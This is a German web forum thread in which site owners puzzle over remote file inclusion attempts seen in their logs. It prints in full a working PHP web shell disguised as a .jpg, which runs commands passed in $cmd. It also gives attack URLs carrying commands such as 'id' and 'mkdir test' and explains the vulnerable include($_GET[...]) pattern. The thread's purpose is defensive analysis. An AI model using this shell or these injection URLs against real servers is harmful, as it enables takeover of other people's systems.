Will mich da einer Hacken?

[Tetsuo]

Ich hab mir ein kleines Extra in mein PHP Script geschrieben das mich per Mail informiert wenn auf einer meiner Sites ins leere führt. In der Mail steht dann auf welcher Site der Link ist und wohin er füren sollte.

Jetzt hab ich ne Mail bekommen:
http ://ww w.meineSeite.de/index.php?page=http://nichtMeineSeite.org/lila.jpg

Ich hab mir jetzt mal die Seite http://nichtMeineSeite.org/lila.jpg angeschaut.

Das hier hab ich gefunden:

PHP-Code:

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
  <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
    <tr>
      <td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
 </tr>
  </table>
</div>

<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:PHPSHELL@bol.com.br">Contact
      Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
:D </b>
</font>

Kann mir einer erklären was genau der Typ da versucht? Ich werd aus dem Script nicht ganz schlau

[Peter]

Das selbe Phänomen hab ich bei meiner Seite auch schon öfters bemerkt.

Es handelt sich dann um
w w w.meineseite.com/ref.php?n=http://www.aace.com/2002/photos/TNImage/tn_DSC00398.JPG.jpg?&cmd=id
wobei ref.php normal zahlen von 1-100 enthält
z.B. ref.php?n=45 aber nie eine url...

Vielleicht hilft das wem zum Aufschlüsseln.

Grüße,
Peter

[Tetsuo]

Bei mir sehen die Links normalterweise so aus:
http ://ww w.meineSeite.de/index.php?page=SeiteABC

wobei SeiteABC nicht der Name einer Datei ist sondern ein Index eines Arrays .

Ich hab mir mal die angebliche *.jpg aus deinem Link angesehen und die schaut genauso aus wie bei meinem Besucher.

Nur wüsste ich gerne was da genau passiert. Es handelt sich um die Site eines Kunden und die würde ich gerne gegen solche Freaks schützen. Ich glaub nicht das er etwas erreicht hat, aber man kann ja nie wissen

[Strogij]

Das sind (wahrscheinlich) Noobs, die versuchen deinen Server zu hacken und zwar mit dieser Möglichkeit (der Fehler könnte jedem passieren):

PHP-Code:

<html>
...
include($_GET['seite']);
...
</html> 


Wenn ich nun etwas wie skript?seite=www.andereseite.jpg eingebe (statt der gedachten Seiten, die man selbst erstellt hat) und in der .jpg der PHP-Code ist - wird es inkludiert und als PHP-Code auf deinem Server ausgeführt! Man hat dann die volle Kontrolle über den Server.

[feuervogel]

Wenn "URL fopen wrappers" in PHP aktiviert sind (in der Standardkonfiguration ist das der Fall) können Sie als Pfad der einzubindenden Datei auch eine URL (via HTTP oder anderen unterstützen Wrappern - eine Liste der unterstützen Protokolle finden Sie unter Anhang L) statt einer lokalen Pfadangabe angeben. Falls der Zielserver die Zieldatei als PHP-Code interpretiert, können Sie an die einzubindende Datei Variablen in einem Request-String übergeben, genauso wie bei HTTP GET. Streng genommen ist das nicht das Gleiche, wie diese Datei einzubinden und diesem den Geltungsbereich des Vater-Skripts zu vererben; das Skript wird auf dem Remote-Server ausgeführt und danach wird das Ergebnis in das lokale Skript eingebunden.

dazu müsste aber url-fopen-wrappers aktiviert sein, und ich glaube nicht, dass dies auf einem halbwegs sicheren system der fall ist.

[Tetsuo]

Mir ist aber noch immer nicht ganz klar was das script eigentlich anstellt

[Stuck Mojo]

Man kann sich über weitere Parameter in der Shell bewegen und beliebige Programme ausführen - die Ausgabe wird zwischengespeichert und dann im Browser ausgegeben. Steht da doch sogar drin -> "To Execute Command ..."

Gruss
Jan

[mike]

wird auch hier ganz gut beschrieben:

http://groups.google.com/groups?hl=d...D%26ie%3DUTF-8

p.s. da findest sogar genau das script wieder -> kiddy-contest


$cmd wär dann in dem fall mit irgendwelchen commands zum füllen gewesen (z.b. ls, ll usw) dieser output wird dann im cmdtemp - file zwischengespeichert, ausgegeben (cat) und dann spuren verwischt (rm)

der rest läuft dann so, wie jan beschrieben hat.

Viel dürfte dem Angreifer das nicht gebracht haben, da ich - soweit ich aus dem Code ersehen kann - solche relevante dinge wie $cmd nicht mitübergeben werden/wurden.

[Peter]

Habs grad bei mir mit ls ausprobiert.

Das funktioniert super.

[Tetsuo]

Da geht noch einiges mehr... Verzeichnisse schreiben, wechseln & löschen... man muß sich kurz an das handling gewöhnen aber dann gehts wie in der linux shell, und das beste - es geht mit dem script meines Angreifers, von seinem Server aus

zum glück geht es nicht auf meiner site

[Peter]

Da geht noch einiges mehr... Verzeichnisse schreiben, wechseln & löschen... man muß sich kurz an das handling gewöhnen aber dann gehts wie in der linux shell, und das beste - es geht mit dem script meines Angreifers, von seinem Server aus

zum glück geht es nicht auf meiner site

Aber bei seinem Script hat doch $cmd keinen Wert?!

[Tetsuo]

Den übergibst du ja auch dynamisch... wär ja auch blöd wenn du für jeden befehl das script neu speichen müßtest

http ://ww w.meineSeite.de/index.php?age=http://nichtMeineSeite.org/lila.jpg&cms=mkdir test

mein besucher versuchte es heute schon zum 4 mal. Ich hab das script jetzt so umgeschrieben das es ihn beim nächsten mal begrüßt und ihm seine IP ausgibt, mit dem kleinen hinweis dass es jetzt doch einmal zu oft war

[Peter]

Gute Idee.

Ich hab bei mir jetzt auch sowas eingebaut.

[webcreate]

Sicherlich eine Sicherheitslücke, die aber schnell geschlossen werden kann.
Aber zum erstellen von Verzeichnissen, löschen, verschieben, usw.
Da sehe ich doch meine Probleme.
Wer den Apache als root laufen lässt muss sich nicht wundern, das sein System gehackt wird.
Als www-data kann er auf einem logisch geführtem System eigentlich nicht viel anrichten.
Es mag zur Informationsbeschaffung und zum Aufsuchen von offenen Port usw nutzen, aber das war es dann schon.

[Tetsuo]

Jetzt läuft mein Script schon seit einigen Tagen uns speichert fleißig die IP nummern der Penner die versuchen mich zu hacken in einer Datenbank.

Es ist schon erschreckend was im netz so alles los ist . Alleine heute (stand 21:45 Uhr) haben es vier verschiedene Angreifer versucht.

Was kann man da machen , ich hab ihre IP nummern und hab auch noch ein Cookie auf ihrem Rechner hinterlassen. Den Versuch kann ich also beweisen.